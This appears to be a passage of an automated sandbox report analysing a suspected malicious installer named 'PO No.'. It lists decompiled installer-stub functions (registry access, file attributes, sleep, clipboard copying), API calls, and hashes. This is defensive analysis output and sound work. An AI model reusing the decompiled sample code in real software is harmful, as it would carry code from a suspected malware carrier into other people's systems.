                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: PrivateProfileString
                                                                      • String ID:
                                                                      • API String ID: 1096422788-0
                                                                      • Opcode ID: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                                      • Instruction ID: 69d349e7d285c822079f9e4bf846872a9f1ef35916f06b7134f04da07b3971da
                                                                      • Opcode Fuzzy Hash: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                                      • Instruction Fuzzy Hash: 25E0487080420CAADB106FA1CE099BE7A64AF00340F104439F5907B0D1E6FC84415745
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E0040621D(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                                      				void* _t7;
                                                                      				long _t8;
                                                                      				void* _t9;
                                                                      
                                                                      				_t7 = E004061A2(_a4,  &_a12);
                                                                      				if(_t7 != 0) {
                                                                      					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
                                                                      					return _t8;
                                                                      				}
                                                                      				_t9 = 6;
                                                                      				return _t9;
                                                                      			}






                                                                      0x00406227
                                                                      0x0040622e
                                                                      0x00406241
                                                                      0x00000000
                                                                      0x00406241
                                                                      0x00406232
                                                                      0x00000000

                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422708,?,?,004062AB,00422708,00000000,?,?,Call,?), ref: 00406241
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID:
                                                                      • API String ID: 71445658-0
                                                                      • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                      • Instruction ID: 3024dc78f91217c8ac754af2bee00b96045fdb9f0f4599777b3fb0e88d8c22ab
                                                                      • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                      • Instruction Fuzzy Hash: 8AD0123200020DBBDF116E919D05FAB371DEB04310F014426FE16A4091D775D530AB15
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E004015A3() {
                                                                      				int _t5;
                                                                      				void* _t11;
                                                                      				int _t14;
                                                                      
                                                                      				_t5 = SetFileAttributesW(E00402C37(0xfffffff0),  *(_t11 - 0x24)); // executed
                                                                      				_t14 = _t5;
                                                                      				if(_t14 == 0) {
                                                                      					 *((intOrPtr*)(_t11 - 4)) = 1;
                                                                      				}
                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t11 - 4));
                                                                      				return 0;
                                                                      			}






                                                                      0x004015ae
                                                                      0x004015b4
                                                                      0x004015b6
                                                                      0x00402885
                                                                      0x00402885
                                                                      0x00402ac2
                                                                      0x00402ace

                                                                      APIs
                                                                      • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: 29d25e4036f002882842ff2abbc33b1b61682e4b1f0e1c41cb6674e83b655918
                                                                      • Instruction ID: 608ef69ca2b13f27eda1cfcd16162797e0d7c1effb02ba883df1ee114d760796
                                                                      • Opcode Fuzzy Hash: 29d25e4036f002882842ff2abbc33b1b61682e4b1f0e1c41cb6674e83b655918
                                                                      • Instruction Fuzzy Hash: 44D01272B04104DBDB21DBA4AF0859D73A59B10364B204677E101F11D1DAB989559A1D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00403441(long _a4) {
                                                                      				long _t2;
                                                                      
                                                                      				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                                      				return _t2;
                                                                      			}




                                                                      0x0040344f
                                                                      0x00403455

                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313F,?), ref: 0040344F
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointer
                                                                      • String ID:
                                                                      • API String ID: 973152223-0
                                                                      • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                      • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                      • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                      • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E0040437A(int _a4) {
                                                                      				long _t2;
                                                                      
                                                                      				_t2 = SendMessageW( *0x42a248, 0x28, _a4, 1); // executed
                                                                      				return _t2;
                                                                      			}




                                                                      0x00404388
                                                                      0x0040438e

                                                                      APIs
                                                                      • SendMessageW.USER32(00000028,?,00000001,004041A5), ref: 00404388
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                      • Instruction ID: e4171d0a4592585bcf4a2ca6fb2eaed9aff33c093be5cb9cf1e9125a9c9e1139
                                                                      • Opcode Fuzzy Hash: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                      • Instruction Fuzzy Hash: 0EB09235290600ABDE214B40DE49F457A62E7A4701F008178B240640B0CAB200A1DB19
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E004014D7(intOrPtr __edx) {
                                                                      				long _t3;
                                                                      				void* _t7;
                                                                      				intOrPtr _t10;
                                                                      				void* _t13;
                                                                      
                                                                      				_t10 = __edx;
                                                                      				_t3 = E00402C15(_t7);
                                                                      				 *((intOrPtr*)(_t13 - 0x4c)) = _t10;
                                                                      				if(_t3 <= 1) {
                                                                      					_t3 = 1;
                                                                      				}
                                                                      				Sleep(_t3); // executed
                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t13 - 4));
                                                                      				return 0;
                                                                      			}







                                                                      0x004014d7
                                                                      0x004014d8
                                                                      0x004014e1
                                                                      0x004014e4
                                                                      0x004014e8
                                                                      0x004014e8
                                                                      0x004014ea
                                                                      0x00402ac2
                                                                      0x00402ace

                                                                      APIs
                                                                      • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: cb92cf7ccb1965bdce3badc7d49dd673c55c158fa478f1f9cab94f81649d65d9
                                                                      • Instruction ID: adf76bd272608bb1b99769d9a9b05885636640fbfa2c3f91bbd7a8ebdab0685d
                                                                      • Opcode Fuzzy Hash: cb92cf7ccb1965bdce3badc7d49dd673c55c158fa478f1f9cab94f81649d65d9
                                                                      • Instruction Fuzzy Hash: 45D0A773F141008BD720EBB8BE8945E73F8E7803193208837E102F11D1E578C8928A2D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E1000121B() {
                                                                      				void* _t3;
                                                                      
                                                                      				_t3 = GlobalAlloc(0x40,  *0x1000406c +  *0x1000406c); // executed
                                                                      				return _t3;
                                                                      			}




                                                                      0x10001225
                                                                      0x1000122b

                                                                      APIs
                                                                      • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7117138785.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000001.00000002.7117107508.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7117175931.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7117207358.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_10000000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: AllocGlobal
                                                                      • String ID:
                                                                      • API String ID: 3761449716-0
                                                                      • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                      • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                                      • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                      • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 95%
                                                                      			E00405553(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                      				struct HWND__* _v8;
                                                                      				long _v12;
                                                                      				struct tagRECT _v28;
                                                                      				void* _v36;
                                                                      				signed int _v40;
                                                                      				int _v44;
                                                                      				int _v48;
                                                                      				signed int _v52;
                                                                      				int _v56;
                                                                      				void* _v60;
                                                                      				void* _v68;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				struct HWND__* _t94;
                                                                      				long _t95;
                                                                      				int _t100;
                                                                      				void* _t108;
                                                                      				intOrPtr _t130;
                                                                      				struct HWND__* _t134;
                                                                      				int _t156;
                                                                      				int _t159;
                                                                      				struct HMENU__* _t164;
                                                                      				struct HWND__* _t168;
                                                                      				struct HWND__* _t169;
                                                                      				int _t171;
                                                                      				void* _t172;
                                                                      				short* _t173;
                                                                      				short* _t175;
                                                                      				int _t177;
                                                                      
                                                                      				_t169 =  *0x429224;
                                                                      				_t156 = 0;
                                                                      				_v8 = _t169;
                                                                      				if(_a8 != 0x110) {
                                                                      					if(_a8 == 0x405) {
                                                                      						CloseHandle(CreateThread(0, 0, E004054E7, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                                                                      					}
                                                                      					if(_a8 != 0x111) {
                                                                      						L17:
                                                                      						_t171 = 1;
                                                                      						if(_a8 != 0x404) {
                                                                      							L25:
                                                                      							if(_a8 != 0x7b) {
                                                                      								goto L20;
                                                                      							}
                                                                      							_t94 = _v8;
                                                                      							if(_a12 != _t94) {
                                                                      								goto L20;
                                                                      							}
                                                                      							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                                      							_a8 = _t95;
                                                                      							if(_t95 <= _t156) {
                                                                      								L36:
                                                                      								return 0;
                                                                      							}
                                                                      							_t164 = CreatePopupMenu();
                                                                      							AppendMenuW(_t164, _t156, _t171, E004063D2(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                                      							_t100 = _a16;
                                                                      							_t159 = _a16 >> 0x10;
                                                                      							if(_a16 == 0xffffffff) {
                                                                      								GetWindowRect(_v8,  &_v28);
                                                                      								_t100 = _v28.left;
                                                                      								_t159 = _v28.top;
                                                                      							}
                                                                      							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                                                                      								_v60 = _t156;
                                                                      								_v48 = 0x423728;
                                                                      								_v44 = 0x1000;
                                                                      								_a4 = _a8;
                                                                      								do {
                                                                      									_a4 = _a4 - 1;
                                                                      									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                                                                      								} while (_a4 != _t156);
                                                                      								OpenClipboard(_t156);
                                                                      								EmptyClipboard();
                                                                      								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                                      								_a4 = _t108;
                                                                      								_t172 = GlobalLock(_t108);
                                                                      								do {
                                                                      									_v48 = _t172;
                                                                      									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                                      									 *_t173 = 0xd;
                                                                      									_t175 = _t173 + 2;
                                                                      									 *_t175 = 0xa;
                                                                      									_t172 = _t175 + 2;
                                                                      									_t156 = _t156 + 1;
                                                                      								} while (_t156 < _a8);
                                                                      								GlobalUnlock(_a4);
                                                                      								SetClipboardData(0xd, _a4);
                                                                      								CloseClipboard();
                                                                      							}
                                                                      							goto L36;
                                                                      						}
                                                                      						if( *0x42920c == _t156) {
                                                                      							ShowWindow( *0x42a248, 8);
                                                                      							if( *0x42a2ec == _t156) {
                                                                      								E00405414( *((intOrPtr*)( *0x422700 + 0x34)), _t156);
                                                                      							}
                                                                      							E0040431E(_t171);
                                                                      							goto L25;
                                                                      						}
                                                                      						 *0x421ef8 = 2;
                                                                      						E0040431E(0x78);
                                                                      						goto L20;
                                                                      					} else {
                                                                      						if(_a12 != 0x403) {
                                                                      							L20:
                                                                      							return E004043AC(_a8, _a12, _a16);
                                                                      						}
                                                                      						ShowWindow( *0x429210, _t156);
                                                                      						ShowWindow(_t169, 8);
                                                                      						E0040437A(_t169);
                                                                      						goto L17;
                                                                      					}
                                                                      				}
                                                                      				_v52 = _v52 | 0xffffffff;
                                                                      				_v40 = _v40 | 0xffffffff;
                                                                      				_t177 = 2;
                                                                      				_v60 = _t177;
                                                                      				_v56 = 0;
                                                                      				_v48 = 0;
                                                                      				_v44 = 0;
                                                                      				asm("stosd");
                                                                      				asm("stosd");
                                                                      				_t130 =  *0x42a254;
                                                                      				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                                      				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                                      				 *0x429210 = GetDlgItem(_a4, 0x403);
                                                                      				 *0x429208 = GetDlgItem(_a4, 0x3ee);
                                                                      				_t134 = GetDlgItem(_a4, 0x3f8);
                                                                      				 *0x429224 = _t134;
                                                                      				_v8 = _t134;
                                                                      				E0040437A( *0x429210);
                                                                      				 *0x429214 = E00404CB1(4);
                                                                      				 *0x42922c = 0;
                                                                      				GetClientRect(_v8,  &_v28);
                                                                      				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                                      				SendMessageW(_v8, 0x1061, 0,  &_v60);
                                                                      				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
                                                                      				if(_a8 >= 0) {
                                                                      					SendMessageW(_v8, 0x1001, 0, _a8);
                                                                      					SendMessageW(_v8, 0x1026, 0, _a8);
                                                                      				}
                                                                      				if(_a12 >= _t156) {
                                                                      					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                                      				}
                                                                      				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                      				_push(0x1b);
                                                                      				E00404345(_a4);
                                                                      				if(( *0x42a25c & 0x00000003) != 0) {
                                                                      					ShowWindow( *0x429210, _t156);
                                                                      					if(( *0x42a25c & 0x00000002) != 0) {
                                                                      						 *0x429210 = _t156;
                                                                      					} else {
                                                                      						ShowWindow(_v8, 8);
                                                                      					}
                                                                      					E0040437A( *0x429208);
                                                                      				}
                                                                      				_t168 = GetDlgItem(_a4, 0x3ec);
                                                                      				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                                      				if(( *0x42a25c & 0x00000004) != 0) {
                                                                      					SendMessageW(_t168, 0x409, _t156, _a12);
                                                                      					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                                      				}
                                                                      				goto L36;
                                                                      			}

































                                                                      0x0040555b
                                                                      0x00405561
                                                                      0x0040556b
                                                                      0x0040556e
                                                                      0x00405704
                                                                      0x00405728
                                                                      0x00405728
                                                                      0x0040573b
                                                                      0x00405759
                                                                      0x0040575b
                                                                      0x00405763
                                                                      0x004057b9
                                                                      0x004057bd
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004057bf
                                                                      0x004057c5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004057cf
                                                                      0x004057d7
                                                                      0x004057da
                                                                      0x004058dc
                                                                      0x00000000
                                                                      0x004058dc
                                                                      0x004057e9
                                                                      0x004057f4
                                                                      0x004057fd
                                                                      0x00405808
                                                                      0x0040580b
                                                                      0x00405814
                                                                      0x0040581a
                                                                      0x0040581d
                                                                      0x0040581d
                                                                      0x00405835
                                                                      0x0040583e
                                                                      0x00405841
                                                                      0x00405848
                                                                      0x0040584f
                                                                      0x00405857
                                                                      0x00405857
                                                                      0x0040586e
                                                                      0x0040586e
                                                                      0x00405875
                                                                      0x0040587b
                                                                      0x00405887
                                                                      0x0040588e
                                                                      0x00405897
                                                                      0x00405899
                                                                      0x0040589c
                                                                      0x004058ab
                                                                      0x004058ae
                                                                      0x004058b4
                                                                      0x004058b5
                                                                      0x004058bb
                                                                      0x004058bc
                                                                      0x004058bd
                                                                      0x004058c5
                                                                      0x004058d0
                                                                      0x004058d6
                                                                      0x004058d6
                                                                      0x00000000
                                                                      0x00405835
                                                                      0x0040576b
                                                                      0x0040579b
                                                                      0x004057a3
                                                                      0x004057ae
                                                                      0x004057ae
                                                                      0x004057b4
                                                                      0x00000000
                                                                      0x004057b4
                                                                      0x0040576f
                                                                      0x00405779
                                                                      0x00000000
                                                                      0x0040573d
                                                                      0x00405743
                                                                      0x0040577e
                                                                      0x00000000
                                                                      0x00405787
                                                                      0x0040574c
                                                                      0x00405751
                                                                      0x00405754
                                                                      0x00000000
                                                                      0x00405754
                                                                      0x0040573b
                                                                      0x00405574
                                                                      0x00405578
                                                                      0x00405580
                                                                      0x00405584
                                                                      0x00405587
                                                                      0x0040558a
                                                                      0x0040558d
                                                                      0x00405590
                                                                      0x00405591
                                                                      0x00405592
                                                                      0x004055ab
                                                                      0x004055ae
                                                                      0x004055b8
                                                                      0x004055c7
                                                                      0x004055cf
                                                                      0x004055d7
                                                                      0x004055dc
                                                                      0x004055df
                                                                      0x004055eb
                                                                      0x004055f4
                                                                      0x004055fd
                                                                      0x0040561f
                                                                      0x00405625
                                                                      0x00405636
                                                                      0x0040563b
                                                                      0x00405649
                                                                      0x00405657
                                                                      0x00405657
                                                                      0x0040565c
                                                                      0x0040566a
                                                                      0x0040566a
                                                                      0x0040566f
                                                                      0x00405672
                                                                      0x00405677
                                                                      0x00405683
                                                                      0x0040568c
                                                                      0x00405699
                                                                      0x004056a8
                                                                      0x0040569b
                                                                      0x004056a0
                                                                      0x004056a0
                                                                      0x004056b4
                                                                      0x004056b4
                                                                      0x004056c8
                                                                      0x004056d1
                                                                      0x004056da
                                                                      0x004056ea
                                                                      0x004056f6
                                                                      0x004056f6
                                                                      0x00000000

                                                                      APIs
                                                                      • GetDlgItem.USER32(?,00000403), ref: 004055B1
                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004055C0
                                                                      • GetClientRect.USER32(?,?), ref: 004055FD
                                                                      • GetSystemMetrics.USER32(00000002), ref: 00405604
                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405625
                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405636
                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405649
                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405657
                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040566A
                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040568C
                                                                      • ShowWindow.USER32(?,00000008), ref: 004056A0
                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004056C1
                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004056D1
                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004056EA
                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004056F6
                                                                      • GetDlgItem.USER32(?,000003F8), ref: 004055CF
                                                                        • Part of subcall function 0040437A: SendMessageW.USER32(00000028,?,00000001,004041A5), ref: 00404388
                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405713
                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000054E7,00000000), ref: 00405721
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405728
                                                                      • ShowWindow.USER32(00000000), ref: 0040574C
                                                                      • ShowWindow.USER32(?,00000008), ref: 00405751
                                                                      • ShowWindow.USER32(00000008), ref: 0040579B
                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057CF
                                                                      • CreatePopupMenu.USER32 ref: 004057E0
                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004057F4
                                                                      • GetWindowRect.USER32(?,?), ref: 00405814
                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040582D
                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405865
                                                                      • OpenClipboard.USER32(00000000), ref: 00405875
                                                                      • EmptyClipboard.USER32 ref: 0040587B
                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405887
                                                                      • GlobalLock.KERNEL32(00000000), ref: 00405891
                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A5
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004058C5
                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004058D0
                                                                      • CloseClipboard.USER32 ref: 004058D6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                      • String ID: (7B${
                                                                      • API String ID: 590372296-525222780
                                                                      • Opcode ID: f086514403ad079958e05c79f9398a2ee239ec86c73215fd307c521ee98444fa
                                                                      • Instruction ID: f8c5fe522ebc9739dae7df13929d3a15495bf3740f19f89270c8c50aa4207807
                                                                      • Opcode Fuzzy Hash: f086514403ad079958e05c79f9398a2ee239ec86c73215fd307c521ee98444fa
